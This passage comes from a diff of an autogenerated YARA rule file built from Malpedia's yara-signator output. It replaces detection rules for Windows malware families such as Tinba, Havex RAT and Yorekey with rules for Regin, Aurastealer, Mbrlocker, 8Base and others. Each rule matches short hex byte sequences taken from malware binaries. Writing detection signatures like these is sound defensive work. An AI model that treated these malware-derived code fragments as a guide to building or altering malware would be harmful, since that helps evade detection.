+		$sequence_139 = { 90 89ce 83e603 750c 8b5d10 }
+		$sequence_140 = { 8b3a 83c204 8b0a 83e908 }
 
 	condition:
-		7 of them and filesize < 2191360
+		7 of them and filesize < 2940928
 }
-rule MALPEDIA_Win_Leash_Auto : FILE
+rule MALPEDIA_Win_Covid22_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "834a92ba-9821-599a-958a-a52bb0a34e26"
+		id = "99a02a74-d0a3-533c-b448-35480cff51fc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.leash_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.covid22_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "c93eec2e1f2f1d66b27a1254f16f6dd424c1be05af8702a857f092a6abe7b4de"
+		logic_hash = "968cf98e2e8c36cdb3ce45b1a5e5186c5425f3f25bc15cd333cdcc77eeba73ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103280,32 +103716,32 @@ rule MALPEDIA_Win_Leash_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 85c0 744f 8b0e 53 83c10c }
-		$sequence_1 = { e8???????? 8bf8 8d8548feffff 6a0a 50 6a00 56 }
-		$sequence_2 = { 8b5d08 8d55cc 50 52 8d8bff000000 c645fc02 }
-		$sequence_3 = { 83c41c 83f8ff 0f8482010000 85c0 }
-		$sequence_4 = { 83c41c f2ae f7d1 2bf9 8bd1 8bf7 8bfd }
-		$sequence_5 = { 8b7c242c 6800040000 8d8328380000 57 50 e8???????? 668b44243c }
-		$sequence_6 = { aa b9ff000000 33c0 8dbc2411040000 f3ab }
-		$sequence_7 = { 8dbd5df9ffff 889d5cf9ffff f3ab 66ab aa b9ff000000 33c0 }
-		$sequence_8 = { 68???????? e8???????? a1???????? 83c40c 8d95e4f7ffff 8d8819100000 51 }
-		$sequence_9 = { e9???????? 8d8424fc290000 8d8c24fc050000 50 51 e8???????? }
+		$sequence_0 = { 8a4d78 83c40c f6c102 8975dc 897d08 }
+		$sequence_1 = { 57 e8???????? 8d7438ff 3bf7 }
+		$sequence_2 = { 8b3d???????? ffd7 8b4608 85c0 7403 50 ffd7 }
+		$sequence_3 = { 33d9 81e3ff000000 c1e908 330c9df0904000 0fb65801 }
+		$sequence_4 = { 89c3 83fb01 7532 ff35???????? }
+		$sequence_5 = { e8???????? 8d0df4b14000 5a e8???????? 8b442414 e8???????? 50 }
+		$sequence_6 = { 83c001 8bce c1e908 330c9df0904000 0fb618 33d9 }
+		$sequence_7 = { 8d0d14b24000 e8???????? ba???????? 8d0d18b24000 e8???????? ba???????? }
+		$sequence_8 = { c705????????0a4c4000 c705????????304c4000 c705????????01000000 837d1c00 7507 c7451c00904000 }
+		$sequence_9 = { ba???????? 8d0d10b24000 e8???????? ba???????? 8d0d14b24000 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 1955840
 }
-rule MALPEDIA_Win_Yorekey_Auto : FILE
+rule MALPEDIA_Win_Aurastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53555fbf-037b-5e64-8224-50e96dcbd224"
+		id = "8c36a500-8774-5585-be5e-1badb5bb0481"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yorekey_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aurastealer_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "41e7314d91a8ca800c9d1b91b639e00add0929573052dd3660fca999dcefb1ff"
+		logic_hash = "8480b12b568e7fb011f2e56db2dfa5eb1d5aeacb4a24d1ba1c2deb0c82ba7d5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103319,37 +103755,38 @@ rule MALPEDIA_Win_Yorekey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750a 85c0 7506 ff15???????? }
-		$sequence_1 = { 4881ec80000000 488b05???????? 4833c4 488945f0 488d55a0 }
-		$sequence_2 = { a1???????? 8bd0 83f910 7305 ba???????? }
-		$sequence_3 = { 3da1000000 761b 3da3000000 7714 }
-		$sequence_4 = { 488bc7 c6041800 ffc5 49ffc6 }
-		$sequence_5 = { 488b05???????? 4833c4 4889442458 8b01 488bf9 }
-		$sequence_6 = { 88541c2f 4881fb00010000 72dd 8b5704 8b0f 4c8d442430 4c8bce }
-		$sequence_7 = { 8bd9 7418 488d0df7f50000 e8???????? 85c0 7408 }
-		$sequence_8 = { 50 56 8d8c240c080000 51 52 ffd7 }
-		$sequence_9 = { 8955f0 0fbe13 52 894dec 8b0d???????? 8945f4 8d45e4 }
-		$sequence_10 = { 8d4598 b919000000 be???????? 8d7d98 50 f3a5 ff15???????? }
-		$sequence_11 = { 68ff000000 e8???????? 59 59 8b7508 8d34f5d8194100 }
-		$sequence_12 = { 0fbe84c140e14000 6a07 c1f804 59 }
-		$sequence_13 = { cc 488d0de61f0100 e8???????? cc 85f6 }
-		$sequence_14 = { 488b13 498b0f 488d0549470000 4889442450 488b85f0040000 4c8d442430 4889442460 }
+		$sequence_0 = { 09f8 894648 83c110 894e44 8b7e30 }
+		$sequence_1 = { 09f9 85d2 0f49c8 89f5 }
+		$sequence_2 = { 09fb 895e48 83c110 894e44 }
+		$sequence_3 = { 09fb 8b0c24 0fb68c0e32900000 01d1 }
+		$sequence_4 = { 0a1c24 751f 8b7920 8b3f }
+		$sequence_5 = { 0a442404 89ee 7456 8b6c2410 }
+		$sequence_6 = { 09fa d1ea 89f7 83e601 }
+		$sequence_7 = { 0a4c2410 751c 6840df0400 6a01 }
+		$sequence_8 = { 01442428 8bf1 13d9 33d2 }
+		$sequence_9 = { 01442420 13d1 c1eb0b 0fa4c115 }
+		$sequence_10 = { 012c18 42 3bd7 72dc }
+		$sequence_11 = { 014c241c 13f0 33d2 89742420 }
+		$sequence_12 = { 014c2420 8be8 13f0 33ff }
+		$sequence_13 = { 0144241c 8b7c2424 136c2414 33c0 }
+		$sequence_14 = { 0128 42 3bd7 72db }
+		$sequence_15 = { 0002 8a0c0f 83c40c 020e }
 
 	condition:
-		7 of them and filesize < 274432
+		7 of them and filesize < 1918976
 }
-rule MALPEDIA_Win_Havex_Rat_Auto : FILE
+rule MALPEDIA_Win_Blackcoffee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f3fbb0af-43ac-5647-9a79-89548fc57d3c"
+		id = "c2ef4943-3003-5a8e-b84c-2fdafd870b99"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.havex_rat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackcoffee_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9d2eae0c4a7abc70e6bf5636f95e7cb91a062b9062076188516a0129d3184ea5"
+		logic_hash = "b695e8fbe67a22ec1c98f5f738aa4dd5737b4b8062371c0306d53cad47c03140"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103363,32 +103800,32 @@ rule MALPEDIA_Win_Havex_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 50 51 ff15???????? 68???????? 8d4dd8 8bf0 }
-		$sequence_1 = { 83c8ff 2b4560 3bd8 7601 49 42 ebe4 }
-		$sequence_2 = { 8d5c242c 89642428 8938 897808 89780c 897810 }
-		$sequence_3 = { 8b4508 c9 c3 3b442404 741c 56 8d7004 }
-		$sequence_4 = { 8d8e94c90000 8955d8 0fb69002010000 0fb638 c1e210 0bd7 8951fc }
-		$sequence_5 = { 8d4d88 0f9445c3 c645fc05 e8???????? 385dc3 7507 }
-		$sequence_6 = { e8???????? ff75ec 8d450c ff75e8 8bce 50 8b4508 }
-		$sequence_7 = { 6a01 50 ff7514 8d44243c ff7510 50 57 }
-		$sequence_8 = { 83c104 ff4df8 837df800 7fe3 8b75e0 }
-		$sequence_9 = { ff7004 ff15???????? 8bd8 83fb02 7504 32c0 eb2f }
+		$sequence_0 = { ff75fc 57 6a01 ff15???????? 8bd8 3bdf }
+		$sequence_1 = { 53 e8???????? 83c40c ffd3 3bc7 7460 8b5610 }
+		$sequence_2 = { 897dfc 8945f4 50 8d4610 }
+		$sequence_3 = { 50 c70614000000 ff15???????? 8d85dcfeffff 83c40c 8945e8 8d45e0 }
+		$sequence_4 = { c68501f0ffff36 c68502f0ffff34 c68503f0ffff50 c68504f0ffff72 }
+		$sequence_5 = { 8b45fc 89460c c70614000000 e9???????? 83660c00 8d85b4feffff 50 }
+		$sequence_6 = { 6800800000 57 53 ff15???????? 8b4610 }
+		$sequence_7 = { e8???????? 8806 8d45b0 50 }
+		$sequence_8 = { 897dfc 57 ff15???????? 8bd8 3bdf 747a 8b460c }
+		$sequence_9 = { 895efc ff75f8 56 e8???????? 83c40c 56 }
 
 	condition:
-		7 of them and filesize < 892928
+		7 of them and filesize < 118784
 }
-rule MALPEDIA_Win_Roseam_Auto : FILE
+rule MALPEDIA_Win_Unidentified_045_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d66e57df-f9e1-5b6e-89cb-6ce661f1848e"
+		id = "7710c8cf-a592-5c63-bf57-74d2e907d9db"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.roseam_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_045_auto.yar#L1-L98"
 		license_url = "N/A"
-		logic_hash = "49c65990e1943387e5f2f0be33c8622a534714937967ee32ce82db7fba5361e7"
+		logic_hash = "2c83bad8d9cfd5aadbf00585cf334eb826afab5840caeb0b4d10dd25220749b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103402,32 +103839,30 @@ rule MALPEDIA_Win_Roseam_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c3 8d4db8 c60200 51 }
-		$sequence_1 = { 33c9 66894304 66894b06 50 68???????? }
-		$sequence_2 = { 0f8682000000 66833b20 747c 56 }
-		$sequence_3 = { 9d 5d 8b45f8 85c0 0f84db000000 }
-		$sequence_4 = { 41 40 894dfc 8945f8 68???????? 50 9c }
-		$sequence_5 = { 58 58 8b45bc 48 7409 83e803 0f854c010000 }
-		$sequence_6 = { 8d85f4fcffff 8a10 8a1e 8aca 3ad3 751e 84c9 }
-		$sequence_7 = { 803a2e 740c 8a4201 42 }
-		$sequence_8 = { c7451800000000 84c0 7478 68???????? 50 }
-		$sequence_9 = { b9ff000000 33c0 8dbdf1f7ffff 8895f0f7ffff 8b1e f3ab }
+		$sequence_0 = { 6800040000 53 53 681f000f00 50 }
+		$sequence_1 = { 83e70f 5b 83ff03 7205 83ff08 }
+		$sequence_2 = { 33db 6a68 8d45b8 53 50 895d70 }
+		$sequence_3 = { 7517 ff7638 8b4810 e8???????? }
+		$sequence_4 = { ff7510 8d45f0 56 6a0c 50 }
+		$sequence_5 = { ff7508 897dac 56 ff15???????? }
+		$sequence_6 = { 8901 8b8538ffffff 8b0d???????? 8901 }
+		$sequence_7 = { 03f0 0500040000 894508 8d8ef8000000 3bc8 0f87d6030000 b850450000 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Dyepack_Auto : FILE
+rule MALPEDIA_Win_Regin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "07deca3f-25ed-51d0-81b9-2a80bfd3fbb4"
+		id = "2a1f14e6-74a8-59d6-b749-05fe8ab02b70"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dyepack_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.regin_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "c761a43cdd5c317a044dbb40e0c85464d14b22fce932fc8ee9b2120e24aa5b64"
+		logic_hash = "c115cb715f448d4a7161dd2f6e1e57adc27409e679a96be3c8017531a1cc0da9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103441,32 +103876,32 @@ rule MALPEDIA_Win_Dyepack_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb04 8b4c2410 2bcd 1bc7 7815 }
-		$sequence_1 = { b814100000 e8???????? 53 56 57 33db b9ff030000 }
-		$sequence_2 = { 3bcb 765a eb04 8b4c2410 2bcd }
-		$sequence_3 = { 56 ff15???????? 8d442410 895c2410 50 56 }
-		$sequence_4 = { ff15???????? 56 ff15???????? 8d442410 895c2410 }
-		$sequence_5 = { 53 51 e8???????? 83c408 5d 5f }
-		$sequence_6 = { 53 aa 8b842434100000 53 6800000040 50 ff15???????? }
-		$sequence_7 = { 13fb 3bf8 7cb2 7f08 8b4c2410 3be9 }
-		$sequence_8 = { 53 56 ffd7 8b442414 8b4c2410 33ed 33ff }
-		$sequence_9 = { 7815 7f08 81f900100000 760b b900100000 895c2420 }
+		$sequence_0 = { 48 8bd3 e8???????? 40 32ff 48 8b5c2450 }
+		$sequence_1 = { 41 ffc0 48 8d4c2470 41 b904000000 }
+		$sequence_2 = { 85c0 740d 48 8d3551070000 }
+		$sequence_3 = { 48 0f45c7 4c 3be1 }
+		$sequence_4 = { 7408 33db 895c2460 eb7c 48 }
+		$sequence_5 = { 7505 e8???????? e8???????? 85c0 7518 e8???????? }
+		$sequence_6 = { 3beb 7406 ff15???????? 8ac3 48 8b9c2490000000 }
+		$sequence_7 = { 83ec28 83c8ff 48 85c9 }
+		$sequence_8 = { 89442478 48 85c0 0f84e8000000 }
+		$sequence_9 = { 4c 8d4008 48 8d5010 e8???????? 3ac3 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Mikoponi_Auto : FILE
+rule MALPEDIA_Win_Onionduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "de82eebe-f707-5dc6-9c33-0ae7d7821633"
+		id = "4f0df2d9-b667-583c-9035-10a88bb5a5df"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mikoponi_auto.yar#L1-L107"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.onionduke_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8f3a24b96a22a4d512e188ba3c40bc90dbbbc4bf56cf9ed6cddde59c392fa78b"
+		logic_hash = "489b57dff2d63e712188fb4627ba779c8167a75fd93d25f277ce49d9d63a93ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103480,30 +103915,32 @@ rule MALPEDIA_Win_Mikoponi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b07 50 e8???????? 83c404 5e 5b 5d }
-		$sequence_1 = { 57 e8???????? 2bc7 d1f8 8d742420 }
-		$sequence_2 = { e9???????? 68f4010000 56 ff15???????? 8bf8 e8???????? e9???????? }
-		$sequence_3 = { ff15???????? 8b442468 89442414 89442418 33c0 89442430 }
-		$sequence_4 = { b9???????? 8d442440 668b10 663b11 751e }
-		$sequence_5 = { e8???????? 83c408 8d4c2414 51 57 }
-		$sequence_6 = { 81c470040000 c3 68???????? 68???????? ff15???????? 50 ff15???????? }
-		$sequence_7 = { e8???????? 68???????? e8???????? 68???????? e8???????? 8b7c2420 57 }
+		$sequence_0 = { 56 8b7510 56 894df8 }
+		$sequence_1 = { 8b0f 83c404 5f 8919 }
+		$sequence_2 = { c645fc01 bf08000000 85c0 7417 8b4dd4 }
+		$sequence_3 = { c20c00 8b4d08 8b11 8b4214 56 6a01 ffd0 }
+		$sequence_4 = { 56 e8???????? 837de808 8bf0 720c 8b4dd4 51 }
+		$sequence_5 = { 8a08 40 84c9 75f9 2bc2 750e }
+		$sequence_6 = { ffd0 8b13 894508 8b4208 56 }
+		$sequence_7 = { c20400 8b03 50 e8???????? 83c404 56 ff15???????? }
+		$sequence_8 = { 8b4dfc 33cd e8???????? 8be5 5d c20400 837df408 }
+		$sequence_9 = { 8b4d08 2bd0 c1fa03 3bd1 770a 68???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 330752
+		7 of them and filesize < 671744
 }
-rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
+rule MALPEDIA_Win_Getmail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "606aa04d-2534-5b9c-a7ea-236168d717b6"
+		id = "dbf6f885-27d8-521e-803a-d4cecec2a1f3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snatchcrypto_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.getmail_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "821ad44e204c834b4eeced1dd22888563234f9fd380bbb4b883fee2940f1717e"
+		logic_hash = "2b6fbdf48e4c6a7974cdc409a23649369cc0b33f0a3fc425aba3ea953c2d50db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103517,32 +103954,32 @@ rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 4889ae60030000 488b9330060000 488d0d6e0a0300 e8???????? 4889442460 }
-		$sequence_1 = { e8???????? 488d4d81 33d2 41b803010000 c6458000 e8???????? 488d8db1020000 }
-		$sequence_2 = { c1c80b 410bca 458bc2 4433c8 4123ce 418bc4 c1c806 }
-		$sequence_3 = { 740d 4c39b380010000 0f858b000000 bfc4feffff 488b4310 4c8b7c2470 4c8b6c2478 }
-		$sequence_4 = { 7499 488d1597280600 488bcf e8???????? 85c0 7486 488d158c280600 }
-		$sequence_5 = { 0fb605???????? 4188440f02 48635320 4c634324 48039590020000 4183c703 418bcf }
-		$sequence_6 = { 4889742418 57 4881ece0010000 488b05???????? 4833c4 48898424d0010000 488b7908 }
-		$sequence_7 = { 8bd8 85c0 0f85d3000000 4885f6 7416 488bce e8???????? }
-		$sequence_8 = { 0fb78b94030000 0fb7937e020000 410fb7c0 450fb7c8 c1e904 83e101 66c1e80a }
-		$sequence_9 = { 410fb6cb e8???????? 85c0 7547 448d4005 0fb6d3 410fb6cb }
+		$sequence_0 = { 89442428 eb07 8d4c241c 51 }
+		$sequence_1 = { f3a4 8b442410 395840 7463 8b704c 8b7848 a1???????? }
+		$sequence_2 = { e8???????? 83c40c 85c0 752d bf???????? 83c9ff f2ae }
+		$sequence_3 = { 56 e8???????? 83c40c 895c2430 85c0 }
+		$sequence_4 = { 7cf1 56 8bf1 c1e603 3b9618444100 }
+		$sequence_5 = { 895c244c 895c2450 8b84243c020000 8d54247c 52 53 8b08 }
+		$sequence_6 = { 8bfe 8bcb 33c0 f2ae f7d1 49 51 }
+		$sequence_7 = { 8b4d00 68???????? 51 e8???????? 83c408 85c0 }
+		$sequence_8 = { 8b442420 3bc3 741d 8d48ff 8a40ff 84c0 }
+		$sequence_9 = { 8d542418 89442408 8b442410 56 52 8b08 }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Tinba_Auto : FILE
+rule MALPEDIA_Win_Mbrlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9e77c24-46b9-5cf7-a828-2a850fe6f2a6"
+		id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinba_auto.yar#L1-L142"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mbrlocker_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "374a170ff41ebad47f064bc534bfadb5eb7ba02780fab8542e6fa86bf64ae9a3"
+		logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103556,35 +103993,32 @@ rule MALPEDIA_Win_Tinba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b7508 ad 50 56 }
-		$sequence_1 = { 8b4510 aa 8b450c ab }
-		$sequence_2 = { 6a00 6a00 ff750c 6a00 6a00 ff7508 }
-		$sequence_3 = { 8a241f 88240f 88041f 41 }
-		$sequence_4 = { 7416 66b80d0a 66ab b8436f6f6b ab b869653a20 }
-		$sequence_5 = { 7437 b912000000 48 8d3db0010000 807a180f }
-		$sequence_6 = { 72ee 87ce 89f8 29ce f3a4 29fe }
-		$sequence_7 = { bb0a000000 31d2 f7f3 52 41 }
-		$sequence_8 = { 3c0a 7304 0430 eb02 0437 aa c14d0804 }
-		$sequence_9 = { 40 eb12 ff7514 ff7510 ff750c }
-		$sequence_10 = { 85c0 741b 66b80d0a 66ab b855736572 }
-		$sequence_11 = { 8d7a33 f6c304 740a 834a3540 66a5 }
-		$sequence_12 = { 8b0e 3b4d10 7603 8b4d10 51 57 ff750c }
+		$sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? }
+		$sequence_1 = { 68fe000000 68???????? ffd7 83c408 }
+		$sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 }
+		$sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 }
+		$sequence_4 = { 68ac000000 68???????? e8???????? e8???????? }
+		$sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 }
+		$sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 }
+		$sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 }
+		$sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 }
+		$sequence_9 = { 31c8 e8???????? 68ac000000 68???????? }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 43008
 }
-rule MALPEDIA_Win_Rarstar_Auto : FILE
+rule MALPEDIA_Win_8Base_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9ce52f31-509a-51ae-aa52-a887d95b1b86"
+		id = "c4b48847-5291-521d-93fb-9294f21140e6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rarstar_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8base"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.8base_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "d80756ef2e17ab1b1759226b804a9ad7a0323babf981d01e1610768c38e321da"
+		logic_hash = "b47a40948bded147073cdef65076e2a74aedf9d527ccdea9c267a440037e5b0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103598,32 +104032,32 @@ rule MALPEDIA_Win_Rarstar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89742410 33ed ff15???????? 8b542418 8b3d???????? 52 89442430 }
-		$sequence_1 = { eb26 8d4508 8db664c54000 6a00 50 ff36 }
-		$sequence_2 = { f7d1 2bf9 899c2430030000 8bc1 8bf7 8bfa 899c242c030000 }
-		$sequence_3 = { 8bc6 5e c20400 81ec24030000 53 }
-		$sequence_4 = { 8b0485c0d94000 03c6 8a5004 f6c201 0f849e010000 }
-		$sequence_5 = { 33db 8a940c20010000 8a5c0c20 03c2 03c3 25ff000080 7907 }
-		$sequence_6 = { 81e200008000 52 6a00 6a00 }
-		$sequence_7 = { 899c242c030000 899c2428030000 899c2424030000 899c2420030000 bf???????? 83c9ff }
-		$sequence_8 = { 7405 be01000000 8b442418 57 }
-		$sequence_9 = { 0f8412010000 85f6 779a 8b5c241c 6a00 }
+		$sequence_0 = { 6a00 ff15???????? 8d8e04a2feff 81f98c230000 770b }
+		$sequence_1 = { 8b5104 8b4c2408 c74432f45c394000 5e }
+		$sequence_2 = { 8815???????? c605????????6f 880d???????? c605????????65 c605????????63 }
+		$sequence_3 = { 8d3485c0289100 8b06 83e71f c1e706 03c7 8a5824 }
+		$sequence_4 = { c684249c00000002 50 c7442410043a4000 e8???????? }
+		$sequence_5 = { d3ea 89542414 8b442434 01442414 8b442424 31442410 }
+		$sequence_6 = { ff15???????? 8b442414 40 3d???????? 89442414 0f8c0effffff 8b35???????? }
+		$sequence_7 = { 8bf7 83e61f c1e606 033485c0289100 c745e401000000 }
+		$sequence_8 = { 6689442416 33c9 668954241a 8d442434 50 66894c241c 8b4c241c }
+		$sequence_9 = { 899c24ac000000 3bfb 7449 8b8424b8000000 56 8d742418 }
 
 	condition:
-		7 of them and filesize < 122880
+		7 of them and filesize < 10838016
 }
-rule MALPEDIA_Win_Jripbot_Auto : FILE
+rule MALPEDIA_Win_Darkdew_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dca0814-ee58-53a7-824c-c626a6b40b02"
+		id = "915d3fba-ccdb-58ec-bef5-fbfe3e57f2e5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jripbot_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkdew_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "177d4eed69a2789f1363a5a38a7b17a6a4de0acf1062d48112f06f3ff8f9a1ab"
+		logic_hash = "2001511710881b4d822d294ff1446e10aa21b9b50a4d4e2fae3fc5a2bc0825b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103637,34 +104071,34 @@ rule MALPEDIA_Win_Jripbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 51 50 0fbf45ee 50 be???????? e8???????? }
-		$sequence_1 = { 50 ff15???????? eb61 ff742434 8d842464010000 ff742414 e8???????? }
-		$sequence_2 = { 7436 830804 f6c302 742e 56 ff15???????? 50 }
-		$sequence_3 = { 8d85a8fcffff 8d5001 8a08 40 3acb 75f9 2bc2 }
